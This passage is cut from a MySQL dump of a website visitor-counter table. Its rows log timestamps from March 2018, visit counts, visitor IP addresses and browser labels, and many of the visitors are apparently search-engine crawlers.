,'chrome'),(222970,1521548390,2,2,0,0,'78.111.190.34','chrome'),(222971,1521548441,1,1,0,0,'178.154.171.88','other'),(222972,1521548510,4,4,0,0,'91.196.178.94','chrome'),(222973,1521548604,1,1,0,0,'91.196.178.168','chrome'),(222974,1521548886,1,1,0,0,'54.36.148.235','other'),(222975,1521549006,1,1,0,0,'103.212.146.83','other'),(222976,1521549046,1,1,0,0,'54.36.149.88','other'),(222977,1521549334,2,2,0,0,'77.111.245.13','chrome'),(222978,1521549467,1,1,0,0,'54.210.107.179','other'),(222979,1521549694,1,1,0,0,'87.250.224.46','other'),(222980,1521549792,1,1,0,0,'91.196.178.168','chrome'),(222981,1521550006,1,1,0,0,'216.244.66.237','other'),(222982,1521550497,1,1,0,0,'66.249.66.201','chrome'),(222983,1521550499,1,1,0,0,'141.8.142.74','other'),(222984,1521550848,1,1,0,0,'178.154.171.88','other'),(222985,1521550874,2,2,0,0,'87.250.224.46','other'),(222986,1521550997,1,1,0,0,'91.192.133.225','chrome'),(222987,1521551211,2,2,0,0,'91.196.178.94','chrome'),(222988,1521551502,1,1,0,0,'54.36.148.108','other'),(222989,1521551531,1,1,0,0,'54.36.148.177','other'),(222990,1521551534,1,1,0,0,'54.36.149.12','other'),(222991,1521551760,1,1,0,0,'54.36.148.203','other'),(222992,1521551891,1,1,0,0,'54.36.149.105','other'),(222993,1521552094,1,1,0,0,'141.8.142.74','other'),(222994,1521552299,1,1,0,0,'54.210.107.179','other'),(222995,1521552560,1,1,0,0,'54.36.149.19','other'),(222996,1521552680,1,1,0,0,'8.29.198.25','other'),(222997,1521552774,1,1,0,0,'54.36.148.234','other'),(222998,1521552834,1,1,0,0,'91.196.178.136','firefox'),(222999,1521552858,1,1,0,0,'54.36.149.86','other'),(223000,1521553371,1,1,0,0,'54.36.148.72','other'),(223001,1521553418,1,1,0,0,'54.36.148.100','other'),(223002,1521553795,1,1,0,0,'54.210.107.179','other'),(223003,1521554555,1,1,0,0,'87.250.224.46','other'),(223004,1521554734,2,2,0,0,'130.180.217.51','chrome'),(223005,1521554770,2,2,0,0,'178.154.171.88','other'),(223006,1521554819,1,1,0,0,'216.244.66.237','other'),(223007,1521555280,1,1,0,0,'54.210.107.179','other'),(223008,1521555367,1,1,0,0,'54.36.149.3','other'),(223009,1521555389,1,1,0,0,'40.77.167.109','other'),(223010,1521555406,1,1,0,0,'95.133.33.54','chrome'),(223011,1521555416,1,1,0,0,'54.36.148.39','other'),(223012,1521555732,1,1,0,0,'193.108.50.39','chrome'),(223013,1521556014,2,2,0,0,'91.196.178.94','chrome'),(223014,1521556048,1,1,0,0,'54.36.148.176','other'),(223015,1521556139,1,1,0,0,'54.36.148.255','other'),(223016,1521556177,1,1,0,0,'130.180.217.51','chrome'),(223017,1521556263,1,1,0,0,'80.78.39.180','chrome'),(223018,1521556519,1,1,0,0,'178.154.171.88','other'),(223019,1521556692,1,1,0,0,'54.210.107.179','other'),(223020,1521556732,1,1,0,0,'54.36.149.4','other'),(223021,1521556785,1,1,0,0,'141.8.142.74','other'),(223022,1521556802,1,0,1,0,'66.249.66.201',''),(223023,1521556850,1,1,0,0,'91.196.178.134','firefox'),(223024,1521556853,1,1,0,0,'46.164.155.115','chrome'),(223025,1521556932,1,0,1,0,'66.249.66.199',''),(223026,1521557425,1,1,0,0,'54.36.148.189','other'),(223027,1521557469,1,1,0,0,'94.153.229.229','chrome'),(223028,1521557476,1,1,0,0,'91.196.178.91','firefox'),(223029,1521557776,1,1,0,0,'54.36.148.74','other'),(223030,1521557921,2,2,0,0,'77.111.245.12','chrome'),(223031,1521557924,4,4,0,0,'46.164.155.115','chrome'),(223032,1521558006,1,1,0,0,'176.113.209.232','chrome'),(223033,1521558122,1,1,0,0,'54.210.107.179','other'),(223034,1521558547,1,1,0,0,'188.230.43.254','other'),(223035,1521558691,1,1,0,0,'54.36.148.110','other'),(223036,1521558749,1,1,0,0,'54.36.148.64','other'),(223037,1521558900,1,1,0,0,'195.34.204.59','chrome'),(223038,1521559208,1,1,0,0,'54.36.149.86','other'),(223039,1521559374,1,1,0,0,'141.8.142.74','other'),(223040,1521559512,1,1,0,0,'54.210.107.179','other'),(223041,1521559576,1,1,0,0,'216.244.66.237','other'),(223042,1521559754,1,1,0,0,'54.36.148.185','other'),(223043,1521560218,1,1,0,0,'54.36.149.49','other'),(223044,1521560405,1,1,0,0,'91.209.11.236','other'),(223045,1521560764,1,1,0,0,'66.102.9.35','chrome'),(223046,1521560903,1,1,0,0,'188.230.43.254','other'),(223047,1521560925,3,3,0,0,'178.154.171.88','other'),(223048,1521561000,2,2,0,0,'77.111.245.13','chrome'),(223049,1521561035,1,1,0,0,'54.36.148.110','other'),(223050,1521561050,1,1,0,0,'54.210.107.179','other'),(223051,1521561207,2,2,0,0,'141.8.142.74','other'),(223052,1521561616,1,1,0,0,'93.76.210.23','firefox'),(223053,1521561795,1,1,0,0,'91.196.178.77','firefox'),(223054,1521562127,1,1,0,0,'91.196.178.129','chrome'),(223055,1521562181,3,3,0,0,'95.132.118.56','chrome'),(223056,1521562316,1,1,0,0,'141.8.142.74','other'),(223057,1521562415,3,3,0,0,'37.54.114.62','chrome'),(223058,1521562459,1,1,0,0,'54.210.107.179','other'),(223059,1521562471,1,1,0,0,'195.10.210.70','chrome'),(223060,1521562688,1,0,1,0,'66.249.66.201',''),(223061,1521562746,1,1,0,0,'188.230.43.254','other'),(223062,1521563069,1,1,0,0,'54.36.149.38','other'),(223063,1521563145,1,1,0,0,'54.36.148.108','other'),(223064,1521563520,2,2,0,0,'37.54.114.62','chrome'),(223065,1521563550,1,1,0,0,'8.29.198.25','other'),(223066,1521563743,1,1,0,0,'188.230.43.254','other'),(223067,1521563895,1,1,0,0,'54.210.107.179','other'),(223068,1521564022,1,1,0,0,'54.36.148.37','other'),(223069,1521564390,2,2,0,0,'141.8.142.74','other'),(223070,1521564522,2,2,0,0,'46.133.115.112','chrome'),(223071,1521564548,1,1,0,0,'54.36.148.61','other'),(223072,1521564731,1,1,0,0,'87.250.224.46','other'),(223073,1521564882,1,1,0,0,'54.36.148.127','other'),(223074,1521564959,1,1,0,0,'91.196.178.129','chrome'),(223075,1521565040,1,1,0,0,'94.179.247.8','chrome'),(223076,1521565078,1,1,0,0,'54.36.149.7','other'),(223077,1521565103,2,2,0,0,'216.244.66.237','other'),(223078,1521565381,1,1,0,0,'95.132.54.158','chrome'),(223079,1521565462,1,0,1,0,'66.249.66.195',''),(223080,1521565624,1,1,0,0,'141.8.142.74','other'),(223081,1521565707,1,0,1,0,'66.249.66.199',''),(223082,1521565744,1,1,0,0,'188.230.43.254','other'),(223083,1521566190,1,1,0,0,'54.36.149.14','other'),(223084,1521566546,1,1,0,0,'54.36.148.220','other'),(223085,1521566596,1,1,0,0,'54.36.148.170','other'),(223086,1521566642,1,1,0,0,'54.67.59.131','chrome'),(223087,1521566722,1,1,0,0,'54.36.148.105','other'),(223088,1521566838,1,0,1,0,'66.249.66.157',''),(223089,1521566846,1,1,0,0,'54.210.107.179','other'),(223090,1521566985,1,1,0,0,'54.36.149.15','other'),(223091,1521567092,1,1,0,0,'54.36.148.76','other'),(223092,1521567296,1,1,0,0,'54.36.148.121','other'),(223093,1521567519,1,1,0,0,'54.36.148.75','other'),(223094,1521567536,1,1,0,0,'54.36.148.99','other'),(223095,1521567955,2,2,0,0,'92.113.174.6','chrome'),(223096,1521567964,1,1,0,0,'217.69.133.69','other'),(223097,1521568020,1,1,0,0,'54.36.149.2','other'),(223098,1521568088,1,1,0,0,'94.178.147.45','chrome'),(223099,1521568155,1,0,1,0,'66.249.66.199',''),(223100,1521568182,1,1,0,0,'54.36.148.132','other'),(223101,1521568430,1,1,0,0,'54.210.107.179','other'),(223102,1521568446,1,1,0,0,'54.36.148.236','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (223103,1521568739,1,1,0,0,'94.179.247.8','chrome'),(223104,1521568871,1,1,0,0,'141.8.142.74','other'),(223105,1521569042,1,1,0,0,'54.36.149.91','other'),(223106,1521569085,1,1,0,0,'54.36.148.167','other'),(223107,1521569427,2,2,0,0,'37.54.114.62','chrome'),(223108,1521569609,2,2,0,0,'54.36.148.179','other'),(223109,1521569612,1,1,0,0,'95.132.54.158','chrome'),(223110,1521569617,1,1,0,0,'54.36.148.236','other'),(223111,1521569802,1,1,0,0,'54.36.148.207','other'),(223112,1521569846,1,1,0,0,'54.210.107.179','other'),(223113,1521570550,1,1,0,0,'54.36.148.15','other'),(223114,1521571223,1,1,0,0,'54.210.107.179','other'),(223115,1521571360,1,1,0,0,'35.226.23.240','other'),(223116,1521571516,1,1,0,0,'37.9.113.182','other'),(223117,1521571550,1,1,0,0,'141.8.142.74','other'),(223118,1521571760,2,2,0,0,'178.154.171.88','other'),(223119,1521572251,1,1,0,0,'54.36.148.121','other'),(223120,1521572331,1,1,0,0,'216.145.11.94','firefox'),(223121,1521572398,1,1,0,0,'54.36.148.236','other'),(223122,1521572456,1,0,1,0,'66.249.66.195',''),(223123,1521572620,1,1,0,0,'66.249.66.157','chrome'),(223124,1521572628,1,1,0,0,'54.36.148.239','other'),(223125,1521572676,1,1,0,0,'54.210.107.179','other'),(223126,1521572713,2,2,0,0,'91.196.178.161','chrome'),(223127,1521572932,1,0,1,0,'66.249.66.199',''),(223128,1521572951,1,1,0,0,'54.36.149.41','other'),(223129,1521572994,1,1,0,0,'54.36.149.69','other'),(223130,1521573161,3,3,0,0,'178.154.171.88','other'),(223131,1521573314,1,1,0,0,'54.36.148.73','other'),(223132,1521573655,1,1,0,0,'94.179.247.8','chrome'),(223133,1521573953,1,1,0,0,'54.36.148.209','other'),(223134,1521573962,1,1,0,0,'54.36.148.72','other'),(223135,1521574193,1,1,0,0,'54.210.107.179','other'),(223136,1521574265,1,1,0,0,'54.36.149.34','other'),(223137,1521574366,1,1,0,0,'54.36.148.28','other'),(223138,1521574428,1,1,0,0,'8.29.198.26','other'),(223139,1521574451,5,5,0,0,'216.244.66.237','other'),(223140,1521574542,1,1,0,0,'91.196.178.129','chrome'),(223141,1521574659,1,1,0,0,'54.36.148.34','other'),(223142,1521575123,1,1,0,0,'178.154.171.88','other'),(223143,1521575408,1,1,0,0,'94.179.247.8','chrome'),(223144,1521575559,1,0,1,0,'66.249.66.201',''),(223145,1521575608,1,1,0,0,'54.36.149.7','other'),(223146,1521575689,1,1,0,0,'54.210.107.179','other'),(223147,1521575730,1,0,1,0,'66.249.66.199',''),(223148,1521575826,1,1,0,0,'37.9.113.182','other'),(223149,1521576038,1,1,0,0,'54.36.148.213','other'),(223150,1521576181,1,1,0,0,'37.73.252.91','chrome'),(223151,1521576421,1,1,0,0,'54.36.148.184','other'),(223152,1521576447,1,1,0,0,'54.36.148.203','other'),(223153,1521576481,1,1,0,0,'54.36.148.160','other'),(223154,1521576508,1,1,0,0,'54.36.148.235','other'),(223155,1521576594,1,1,0,0,'54.36.148.152','other'),(223156,1521576753,1,1,0,0,'178.154.171.88','other'),(223157,1521576807,1,1,0,0,'54.36.148.208','other'),(223158,1521576851,1,1,0,0,'54.36.148.171','other'),(223159,1521576868,1,0,1,0,'66.249.66.201',''),(223160,1521577016,1,1,0,0,'54.36.148.107','other'),(223161,1521577052,1,1,0,0,'54.36.148.96','other'),(223162,1521577154,1,1,0,0,'54.210.107.179','other'),(223163,1521577155,1,1,0,0,'37.9.113.100','other'),(223164,1521577416,1,1,0,0,'176.8.141.224','chrome'),(223165,1521577680,1,1,0,0,'141.8.142.74','other'),(223166,1521577740,1,1,0,0,'216.244.66.237','other'),(223167,1521577959,1,1,0,0,'54.36.148.203','other'),(223168,1521578662,1,1,0,0,'54.210.107.179','other'),(223169,1521578891,1,1,0,0,'54.36.148.90','other'),(223170,1521578970,1,1,0,0,'54.36.148.100','other'),(223171,1521579028,1,1,0,0,'54.36.148.243','other'),(223172,1521579215,1,1,0,0,'216.244.66.237','other'),(223173,1521579218,1,1,0,0,'54.36.149.83','other'),(223174,1521579377,1,1,0,0,'217.69.133.234','other'),(223175,1521579606,1,1,0,0,'178.154.171.88','other'),(223176,1521579956,1,1,0,0,'54.36.148.140','other'),(223177,1521580009,1,1,0,0,'216.244.66.194','other'),(223178,1521580029,1,1,0,0,'54.36.149.1','other'),(223179,1521580624,1,1,0,0,'54.36.149.18','other'),(223180,1521580952,1,1,0,0,'54.36.148.168','other'),(223181,1521581320,1,1,0,0,'54.36.149.55','other'),(223182,1521581523,1,1,0,0,'54.36.148.69','other'),(223183,1521581524,1,1,0,0,'54.36.148.121','other'),(223184,1521581574,1,1,0,0,'54.36.149.17','other'),(223185,1521581611,1,1,0,0,'54.210.107.179','other'),(223186,1521581660,1,1,0,0,'54.36.148.162','other'),(223187,1521581750,1,1,0,0,'54.36.148.223','other'),(223188,1521581956,1,1,0,0,'54.36.148.193','other'),(223189,1521582118,1,1,0,0,'54.36.148.116','other'),(223190,1521582483,2,2,0,0,'91.196.178.161','chrome'),(223191,1521582545,1,1,0,0,'54.36.149.66','other'),(223192,1521582573,1,1,0,0,'216.244.66.237','other'),(223193,1521582579,1,1,0,0,'54.36.148.161','other'),(223194,1521582585,1,1,0,0,'54.36.149.44','other'),(223195,1521582707,1,1,0,0,'54.36.149.31','other'),(223196,1521583073,1,1,0,0,'54.210.107.179','other'),(223197,1521583820,1,1,0,0,'87.250.224.46','other'),(223198,1521583825,2,2,0,0,'37.73.212.143','chrome'),(223199,1521584182,2,2,0,0,'46.201.135.109','chrome'),(223200,1521584238,1,1,0,0,'54.36.149.17','other'),(223201,1521584370,1,1,0,0,'54.36.148.104','other'),(223202,1521584487,1,1,0,0,'54.210.107.179','other'),(223203,1521584833,1,1,0,0,'178.154.171.88','other'),(223204,1521585052,1,1,0,0,'54.36.149.22','other'),(223205,1521585172,1,0,1,0,'66.249.66.195',''),(223206,1521585209,1,1,0,0,'87.250.224.46','other'),(223207,1521585286,1,1,0,0,'8.29.198.27','other'),(223208,1521585904,1,1,0,0,'54.210.107.179','other'),(223209,1521586013,1,1,0,0,'66.249.66.157','chrome'),(223210,1521586078,1,1,0,0,'178.154.171.88','other'),(223211,1521586441,1,1,0,0,'54.36.148.238','other'),(223212,1521586783,1,1,0,0,'54.36.148.21','other'),(223213,1521586977,1,1,0,0,'54.36.148.69','other'),(223214,1521587118,1,1,0,0,'54.36.148.160','other'),(223215,1521587135,1,1,0,0,'54.36.148.255','other'),(223216,1521587332,1,1,0,0,'66.249.66.195','chrome'),(223217,1521587423,1,1,0,0,'54.210.107.179','other'),(223218,1521587532,1,1,0,0,'54.36.148.23','other'),(223219,1521587722,1,1,0,0,'54.36.149.45','other'),(223220,1521588069,1,1,0,0,'178.154.171.88','other'),(223221,1521588181,1,1,0,0,'54.36.148.209','other'),(223222,1521588397,1,1,0,0,'54.36.149.83','other'),(223223,1521588592,2,2,0,0,'141.8.142.74','other'),(223224,1521588822,1,1,0,0,'54.210.107.179','other'),(223225,1521589040,1,1,0,0,'216.244.66.237','other'),(223226,1521589293,1,1,0,0,'54.36.148.89','other'),(223227,1521589571,1,0,1,0,'66.249.66.199',''),(223228,1521589857,1,1,0,0,'54.36.148.116','other'),(223229,1521589893,1,1,0,0,'141.8.142.74','other'),(223230,1521589927,1,1,0,0,'54.36.149.22','other'),(223231,1521590227,1,1,0,0,'54.36.148.90','other'),(223232,1521590315,1,1,0,0,'54.36.149.39','other'),(223233,1521590338,1,1,0,0,'54.36.148.96','other'),(223234,1521590362,1,1,0,0,'54.210.107.179','other'),(223235,1521590381,1,1,0,0,'54.36.148.173','other'),(223236,1521590461,1,1,0,0,'158.69.225.33','other'),(223237,1521590480,1,1,0,0,'158.69.225.33','chrome'),(223238,1521591050,1,1,0,0,'54.36.148.171','other'),(223239,1521591165,1,1,0,0,'54.36.148.145','other'),(223240,1521591209,1,1,0,0,'54.36.148.206','other'),(223241,1521591364,1,1,0,0,'54.36.149.71','other'),(223242,1521591388,1,0,1,0,'66.249.66.199',''),(223243,1521591504,1,1,0,0,'141.8.142.74','other'),(223244,1521591535,1,1,0,0,'54.36.149.24','other'),(223245,1521591601,1,1,0,0,'54.36.148.240','other'),(223246,1521591807,1,1,0,0,'54.210.107.179','other'),(223247,1521592513,1,1,0,0,'141.8.142.74','other'),(223248,1521592834,1,1,0,0,'37.9.113.182','other'),(223249,1521592985,1,1,0,0,'54.36.149.46','other'),(223250,1521592995,1,0,1,0,'66.249.66.157',''),(223251,1521593158,1,1,0,0,'54.36.148.28','other'),(223252,1521593228,1,1,0,0,'54.36.148.134','other'),(223253,1521593238,1,1,0,0,'54.36.149.8','other'),(223254,1521593348,2,2,0,0,'54.36.148.172','other'),(223255,1521593351,1,1,0,0,'54.210.107.179','other'),(223256,1521593454,1,1,0,0,'54.36.149.23','other'),(223257,1521593781,1,1,0,0,'88.200.216.143','chrome'),(223258,1521593782,1,1,0,0,'54.36.148.114','other'),(223259,1521593901,1,1,0,0,'54.36.148.55','other'),(223260,1521593934,1,1,0,0,'91.209.11.236','other'),(223261,1521594118,1,1,0,0,'54.36.148.160','other'),(223262,1521594187,1,1,0,0,'54.36.149.15','other'),(223263,1521594350,1,1,0,0,'87.250.224.46','other'),(223264,1521594583,1,1,0,0,'54.36.148.49','other'),(223265,1521594838,1,1,0,0,'54.36.148.98','other'),(223266,1521595041,1,1,0,0,'216.244.66.237','other'),(223267,1521595267,1,1,0,0,'54.36.148.17','other'),(223268,1521595342,1,1,0,0,'54.36.148.131','other'),(223269,1521595567,1,1,0,0,'54.36.149.59','other'),(223270,1521595699,1,1,0,0,'180.76.15.157','other'),(223271,1521595765,1,1,0,0,'54.36.149.78','other'),(223272,1521595807,1,1,0,0,'54.36.148.176','other'),(223273,1521595825,1,1,0,0,'54.36.148.10','other'),(223274,1521596081,1,1,0,0,'54.36.149.43','other'),(223275,1521596125,1,1,0,0,'8.29.198.25','other'),(223276,1521596283,1,1,0,0,'54.210.107.179','other'),(223277,1521596620,1,1,0,0,'91.196.178.161','chrome'),(223278,1521596754,1,1,0,0,'216.244.66.237','other'),(223279,1521596798,1,1,0,0,'54.36.148.160','other'),(223280,1521596883,74,74,0,0,'54.81.128.172','other'),(223281,1521597032,1,1,0,0,'66.249.66.201','chrome'),(223282,1521597147,1,1,0,0,'54.36.148.136','other'),(223283,1521597218,1,1,0,0,'54.36.149.81','other'),(223284,1521597235,1,1,0,0,'54.36.149.105','other'),(223285,1521597265,1,1,0,0,'54.36.148.254','other'),(223286,1521597333,1,1,0,0,'54.36.149.1','other'),(223287,1521597466,1,1,0,0,'54.36.148.45','other'),(223288,1521597476,1,1,0,0,'54.36.148.157','other'),(223289,1521597614,1,1,0,0,'66.249.66.195','chrome'),(223290,1521597816,1,1,0,0,'54.210.107.179','other'),(223291,1521597857,1,1,0,0,'141.8.142.74','other'),(223292,1521598171,1,1,0,0,'35.226.23.240','other'),(223293,1521598254,1,1,0,0,'54.36.148.141','other'),(223294,1521598748,1,1,0,0,'178.154.171.88','other'),(223295,1521599156,1,1,0,0,'217.69.133.29','other'),(223296,1521599257,1,0,1,0,'66.249.66.201',''),(223297,1521599287,1,0,1,0,'66.249.66.199',''),(223298,1521599366,1,1,0,0,'54.210.107.179','other'),(223299,1521599739,3,3,0,0,'141.8.142.74','other'),(223300,1521599897,1,1,0,0,'54.36.149.81','other'),(223301,1521600152,1,1,0,0,'54.36.148.171','other'),(223302,1521600306,1,1,0,0,'54.36.148.29','other'),(223303,1521600395,1,1,0,0,'178.154.171.88','other'),(223304,1521600488,1,1,0,0,'54.36.148.103','other'),(223305,1521600870,1,1,0,0,'54.210.107.179','other'),(223306,1521601858,1,1,0,0,'54.36.149.65','other'),(223307,1521601975,1,1,0,0,'54.36.149.68','other'),(223308,1521602225,1,1,0,0,'54.36.149.27','other'),(223309,1521602293,1,1,0,0,'54.210.107.179','other'),(223310,1521602397,1,1,0,0,'54.36.148.101','other'),(223311,1521602526,1,1,0,0,'54.36.148.64','other'),(223312,1521602528,1,1,0,0,'54.36.148.116','other'),(223313,1521602641,1,1,0,0,'54.36.148.31','other'),(223314,1521602783,2,2,0,0,'92.113.174.6','chrome'),(223315,1521602861,1,1,0,0,'216.244.66.237','other'),(223316,1521602876,1,1,0,0,'54.36.149.73','other'),(223317,1521603124,1,1,0,0,'54.36.149.45','other'),(223318,1521603139,1,1,0,0,'54.36.149.29','other'),(223319,1521603209,1,1,0,0,'54.36.148.145','other'),(223320,1521603577,1,1,0,0,'54.36.149.44','other'),(223321,1521603634,1,1,0,0,'141.8.142.74','other'),(223322,1521603820,1,1,0,0,'54.210.107.179','other'),(223323,1521603829,1,1,0,0,'54.36.148.114','other'),(223324,1521604060,1,1,0,0,'54.36.148.197','other'),(223325,1521604187,1,1,0,0,'216.244.66.237','other'),(223326,1521604662,1,1,0,0,'54.36.148.246','other'),(223327,1521604672,1,1,0,0,'54.36.149.57','other'),(223328,1521604732,1,1,0,0,'54.36.148.139','other'),(223329,1521604756,1,1,0,0,'178.154.171.88','other'),(223330,1521605169,1,1,0,0,'54.36.149.51','other'),(223331,1521605321,1,1,0,0,'54.210.107.179','other'),(223332,1521605425,1,1,0,0,'54.36.148.142','other'),(223333,1521605541,1,1,0,0,'54.36.148.193','other'),(223334,1521605576,1,1,0,0,'54.36.148.104','other'),(223335,1521605674,1,1,0,0,'54.36.149.105','other'),(223336,1521605738,1,1,0,0,'109.169.46.22','chrome'),(223337,1521605848,1,1,0,0,'180.76.15.24','other'),(223338,1521606263,1,1,0,0,'54.36.148.233','other'),(223339,1521606295,1,1,0,0,'54.36.148.208','other'),(223340,1521606354,1,1,0,0,'141.8.142.74','other'),(223341,1521606535,1,1,0,0,'54.36.148.252','other'),(223342,1521606650,1,1,0,0,'54.36.148.97','other'),(223343,1521606687,1,1,0,0,'178.154.171.88','other'),(223344,1521606821,1,1,0,0,'54.210.107.179','other'),(223345,1521606924,1,1,0,0,'54.36.149.99','other'),(223346,1521606966,1,1,0,0,'8.29.198.26','other'),(223347,1521607058,3,0,3,0,'66.249.66.195',''),(223348,1521607149,1,1,0,0,'54.36.148.199','other'),(223349,1521607382,1,1,0,0,'91.196.178.46','chrome'),(223350,1521607472,1,0,1,0,'66.249.66.199',''),(223351,1521607492,1,1,0,0,'216.244.66.237','other'),(223352,1521608059,1,1,0,0,'54.36.148.99','other'),(223353,1521608234,1,1,0,0,'54.36.148.86','other'),(223354,1521608383,1,1,0,0,'54.210.107.179','other'),(223355,1521608573,1,1,0,0,'54.36.148.119','other'),(223356,1521608781,1,1,0,0,'54.36.148.132','other'),(223357,1521608842,1,1,0,0,'54.36.148.221','other'),(223358,1521609318,1,1,0,0,'54.36.149.61','other'),(223359,1521609435,1,1,0,0,'54.36.149.103','other'),(223360,1521609465,1,1,0,0,'216.244.66.237','other'),(223361,1521609591,1,1,0,0,'54.36.148.117','other'),(223362,1521609863,1,1,0,0,'54.36.149.53','other'),(223363,1521610078,1,1,0,0,'54.36.148.66','other'),(223364,1521610097,1,1,0,0,'54.36.149.4','other'),(223365,1521610303,1,1,0,0,'54.36.149.105','other'),(223366,1521611067,1,0,1,0,'66.249.66.195',''),(223367,1521611069,1,1,0,0,'54.36.148.27','other'),(223368,1521611244,1,1,0,0,'54.36.148.14','other'),(223369,1521611394,1,1,0,0,'54.210.107.179','other'),(223370,1521611443,1,1,0,0,'54.36.149.29','other'),(223371,1521611558,1,1,0,0,'54.36.148.63','other'),(223372,1521611566,1,1,0,0,'54.36.149.6','other'),(223373,1521611724,1,1,0,0,'54.36.148.186','other'),(223374,1521612004,1,1,0,0,'54.36.148.66','other'),(223375,1521612055,1,1,0,0,'54.36.148.12','other'),(223376,1521612105,1,1,0,0,'91.196.178.46','chrome'),(223377,1521612641,1,1,0,0,'54.36.148.255','other'),(223378,1521612922,1,1,0,0,'54.210.107.179','other'),(223379,1521613105,1,1,0,0,'54.36.148.135','other'),(223380,1521613272,1,1,0,0,'54.36.148.189','other'),(223381,1521613345,2,2,0,0,'77.111.244.58','chrome'),(223382,1521613549,1,1,0,0,'54.165.59.7','other'),(223383,1521613701,1,1,0,0,'54.36.149.21','other'),(223384,1521613773,1,1,0,0,'54.36.148.161','other'),(223385,1521613930,1,1,0,0,'54.36.148.99','other'),(223386,1521614107,1,1,0,0,'87.250.224.46','other'),(223387,1521614141,1,1,0,0,'141.8.142.167','other'),(223388,1521614172,1,1,0,0,'54.36.148.89','other'),(223389,1521614420,1,1,0,0,'95.135.41.145','chrome'),(223390,1521614431,1,1,0,0,'54.36.148.192','other'),(223391,1521614451,1,1,0,0,'54.36.148.195','other'),(223392,1521614454,2,2,0,0,'91.196.177.46','chrome'),(223393,1521614535,1,1,0,0,'54.210.107.179','other'),(223394,1521614588,1,1,0,0,'54.36.148.175','other'),(223395,1521614881,1,1,0,0,'193.108.50.39','chrome'),(223396,1521615034,1,0,1,0,'66.249.66.199',''),(223397,1521615183,1,1,0,0,'54.36.148.238','other'),(223398,1521615649,1,1,0,0,'77.111.244.35','chrome'),(223399,1521615769,1,1,0,0,'176.113.209.232','chrome'),(223400,1521615834,1,1,0,0,'54.36.148.228','other'),(223401,1521615854,1,1,0,0,'54.36.148.46','other'),(223402,1521615891,1,1,0,0,'54.36.149.11','other'),(223403,1521615911,2,2,0,0,'195.230.119.59','chrome'),(223404,1521616008,1,1,0,0,'54.210.107.179','other'),(223405,1521616087,1,1,0,0,'54.36.149.7','other'),(223406,1521616177,1,1,0,0,'54.36.148.88','other'),(223407,1521616398,1,1,0,0,'178.154.171.88','other'),(223408,1521616420,1,1,0,0,'54.36.149.26','other'),(223409,1521616424,1,1,0,0,'54.36.148.73','other'),(223410,1521616845,1,1,0,0,'54.36.148.167','other'),(223411,1521617103,1,1,0,0,'188.32.190.177','msie'),(223412,1521617451,1,1,0,0,'54.210.107.179','other'),(223413,1521617456,1,1,0,0,'37.53.90.175','chrome'),(223414,1521617569,1,1,0,0,'54.36.148.181','other'),(223415,1521617803,1,1,0,0,'8.29.198.25','other'),(223416,1521617897,1,1,0,0,'54.36.148.247','other'),(223417,1521617905,1,1,0,0,'54.36.148.140','other'),(223418,1521617923,1,1,0,0,'54.36.148.12','other'),(223419,1521618065,1,1,0,0,'54.36.148.84','other'),(223420,1521618128,2,2,0,0,'77.111.244.68','chrome'),(223421,1521618553,1,1,0,0,'54.36.148.168','other'),(223422,1521618673,1,1,0,0,'91.196.178.134','chrome'),(223423,1521618729,1,1,0,0,'178.154.171.88','other'),(223424,1521618747,1,1,0,0,'46.201.182.124','firefox'),(223425,1521618993,1,1,0,0,'54.210.107.179','other'),(223426,1521619087,1,1,0,0,'54.36.148.66','other'),(223427,1521619182,1,1,0,0,'54.36.148.163','other'),(223428,1521619241,1,1,0,0,'54.36.149.82','other'),(223429,1521619770,2,2,0,0,'91.196.178.27','chrome'),(223430,1521619908,1,0,1,0,'66.249.66.201',''),(223431,1521620140,1,1,0,0,'62.205.134.182','msie'),(223432,1521620260,1,1,0,0,'54.36.148.167','other'),(223433,1521620402,1,1,0,0,'54.210.107.179','other'),(223434,1521620654,1,1,0,0,'54.36.148.121','other'),(223435,1521620753,1,1,0,0,'54.36.148.68','other'),(223436,1521621137,1,1,0,0,'54.36.148.251','other'),(223437,1521621143,2,2,0,0,'46.211.1.38','chrome'),(223438,1521621212,1,0,1,0,'66.249.66.199',''),(223439,1521621220,1,1,0,0,'37.73.251.59','chrome'),(223440,1521621438,1,1,0,0,'54.36.148.99','other'),(223441,1521621541,2,2,0,0,'54.36.149.98','other'),(223442,1521621679,1,1,0,0,'91.196.178.91','chrome'),(223443,1521621709,1,1,0,0,'91.196.178.101','chrome'),(223444,1521621911,1,1,0,0,'54.210.107.179','other'),(223445,1521621998,1,1,0,0,'54.36.148.174','other'),(223446,1521622084,1,1,0,0,'54.36.148.102','other'),(223447,1521622274,1,1,0,0,'54.36.149.12','other'),(223448,1521622275,2,2,0,0,'92.112.125.243','chrome'),(223449,1521622447,1,1,0,0,'54.36.148.52','other'),(223450,1521622665,2,2,0,0,'178.93.4.16','chrome'),(223451,1521622911,1,1,0,0,'54.36.148.136','other'),(223452,1521622956,1,1,0,0,'91.196.178.77','chrome'),(223453,1521622995,1,1,0,0,'54.36.149.24','other'),(223454,1521623058,1,1,0,0,'54.36.148.205','other'),(223455,1521623156,1,1,0,0,'54.36.148.179','other'),(223456,1521623241,1,1,0,0,'141.8.142.74','other'),(223457,1521623326,1,1,0,0,'54.210.107.179','other'),(223458,1521623361,1,1,0,0,'54.36.148.155','other'),(223459,1521623604,1,1,0,0,'91.200.12.98','chrome'),(223460,1521624184,1,1,0,0,'54.36.148.54','other'),(223461,1521624191,1,1,0,0,'54.36.148.214','other'),(223462,1521624275,1,0,1,0,'66.249.66.199',''),(223463,1521624567,1,1,0,0,'91.196.178.132','chrome'),(223464,1521624577,1,1,0,0,'54.36.148.248','other'),(223465,1521624933,1,0,1,0,'66.249.66.201',''),(223466,1521625098,1,1,0,0,'216.244.66.237','other'),(223467,1521625206,1,1,0,0,'54.36.148.103','other'),(223468,1521625485,1,1,0,0,'54.36.148.163','other'),(223469,1521625640,1,1,0,0,'37.54.16.10','chrome'),(223470,1521626031,1,1,0,0,'54.36.148.42','other'),(223471,1521626224,1,1,0,0,'54.36.148.100','other'),(223472,1521626245,1,1,0,0,'54.210.107.179','other'),(223473,1521626355,1,1,0,0,'54.36.148.165','other'),(223474,1521626368,1,1,0,0,'35.226.23.240','other'),(223475,1521626433,1,1,0,0,'54.36.148.249','other'),(223476,1521626473,1,1,0,0,'54.36.149.25','other'),(223477,1521626492,1,0,1,0,'66.249.66.201',''),(223478,1521626831,1,1,0,0,'54.36.148.87','other'),(223479,1521626876,1,1,0,0,'54.36.148.10','other'),(223480,1521626889,1,1,0,0,'95.158.36.152','chro